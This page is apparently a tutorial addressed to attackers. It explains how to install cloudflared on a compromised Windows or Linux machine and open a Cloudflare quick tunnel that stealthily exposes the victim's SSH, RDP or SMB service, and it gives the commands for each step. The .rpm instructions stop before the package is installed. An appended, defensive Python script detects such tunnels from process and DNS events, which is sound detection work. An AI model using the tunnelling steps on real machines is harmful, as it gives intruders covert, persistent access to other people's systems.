CloudFlare Tunnels, a widely used feature in the CloudFlare arsenal, lets users establish secure outbound connections to the CloudFlare network for their web servers or applications.
Setup is simple: you install the cloudflared client, which is available for Linux, Windows, macOS, and Docker.
Once configured, the service becomes accessible on the internet via a user-defined hostname, which serves legitimate scenarios like resource sharing and testing. You can set this tunnel up to stealthily connect to the victim's SSH, RDP, and SMB servers.
With just one command from the victim's device, revealing nothing more than the attacker's distinctive tunnel token, a discreet communication channel can be established. You can also adjust a tunnel's configuration dynamically, toggling its status between disabled and enabled in real time as required.
How to set up and use TryCloudFlare tunnels
Windows
- Download and install cloudflared on the compromised Windows machine via winget:

  ```powershell
  winget install --id Cloudflare.cloudflared
  ```

- Rename download to cloudflared.exe. OPTIONAL: Move cloudflared.exe to where you want it to sit.
- Open up PowerShell and navigate to where cloudflared.exe is before running the following command. Replace PORT with the port you want to tunnel to:

  ```powershell
  cloudflared.exe tunnel localhost:PORT
  ```
Linux
- You will need to download the appropriate .deb (Debian, Ubuntu, Mint) or .rpm (RHEL, Fedora, CentOS) file to the compromised machine, as shown below.

  Installing cloudflared with .deb:

  ```bash
  wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
  dpkg -i cloudflared-linux-amd64.deb
  ```

  Installing cloudflared with .rpm:

  ```bash
  wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-x86_64.rpm
  ```

- Once completed you can create a tunnel by using the following command. Replace PORT with the port you want to tunnel to:

  ```bash
  cloudflared tunnel localhost:PORT
  ```
Accessing The Tunnel
After executing cloudflared it will generate a random subdomain on trycloudflare.com that points to the compromised machine and its selected PORT. You can now use the selected application (ssh, smb, rdp) that corresponds with the port to connect to your new subdomain.
If you're having trouble getting TryCloudFlare to work, it might be best to set up a CloudFlare account and obtain a domain name. You can then go into CloudFlare's "Zero Trust" section and start assigning the tunnels. This approach is more flexible; however, it is less stealthy and takes a few more steps, since you will need to get a domain name and assign it.
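On the detection side, the procedure above leaves two observable traces: a cloudflared tunnel command line pointing at a local port, and DNS lookups under trycloudflare.com. The following is an added example, not part of the original page, that triages both over constructed process and DNS events; the event layout, host names and severity labels are assumptions.

```python
import re

# Services the page names as tunnel targets, keyed by default port.
SENSITIVE_PORTS = {22: "ssh", 445: "smb", 3389: "rdp"}
BINARY = re.compile(r"(?:^|[\\/])cloudflared(?:\.exe)?$", re.I)
LOCAL_TARGET = re.compile(r"^(?:[a-z]+://)?(?:localhost|127\.0\.0\.1):(\d{1,5})$", re.I)
QUICK_TUNNEL = re.compile(r"(?:^|\.)trycloudflare\.com\.?$", re.I)

def check_process(cmdline):
    """Return a finding for a cloudflared tunnel command line, else None."""
    argv = [a.strip('"') for a in cmdline.split()]  # naive split: paths with spaces need real argv
    if not argv or not BINARY.search(argv[0]) or "tunnel" not in [a.lower() for a in argv[1:]]:
        return None
    ports = [int(m.group(1)) for a in argv[1:] if (m := LOCAL_TARGET.match(a))]
    services = sorted(SENSITIVE_PORTS[p] for p in ports if p in SENSITIVE_PORTS)
    return {"ports": ports, "services": services, "severity": "high" if services else "medium"}

def is_quick_tunnel_query(qname):
    """True for trycloudflare.com or any subdomain, false for look-alike suffixes."""
    return bool(QUICK_TUNNEL.search(qname.strip()))

def triage(events):
    """Group evidence per host; process plus DNS evidence on one host is 'confirmed'."""
    hosts = {}
    for ev in events:
        entry = hosts.setdefault(ev["host"], {"process": [], "dns": []})
        if ev["type"] == "process" and (finding := check_process(ev["data"])):
            entry["process"].append(finding)
        elif ev["type"] == "dns" and is_quick_tunnel_query(ev["data"]):
            entry["dns"].append(ev["data"])
    report = {}
    for host, e in hosts.items():
        if e["process"] or e["dns"]:
            high = any(f["severity"] == "high" for f in e["process"])
            report[host] = {"confirmed": bool(e["process"] and e["dns"]),
                            "severity": "high" if high else "medium",
                            "services": sorted({s for f in e["process"] for s in f["services"]})}
    return report

# Constructed sample telemetry (host names and queries are made up for this example).
SAMPLE_EVENTS = [
    {"host": "ws-014", "type": "process", "data": r"C:\Users\Public\cloudflared.exe tunnel localhost:3389"},
    {"host": "ws-014", "type": "dns", "data": "constructed-sample-name.trycloudflare.com"},
    {"host": "srv-02", "type": "process", "data": "/usr/bin/cloudflared tunnel localhost:8080"},
    {"host": "srv-03", "type": "dns", "data": "trycloudflare.com.example.net"},
    {"host": "srv-03", "type": "process", "data": "winget install --id Cloudflare.cloudflared"},
]
if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The DNS check does not depend on the binary's file name, so it is worth keeping alongside the process rule where cloudflared is not an approved tool.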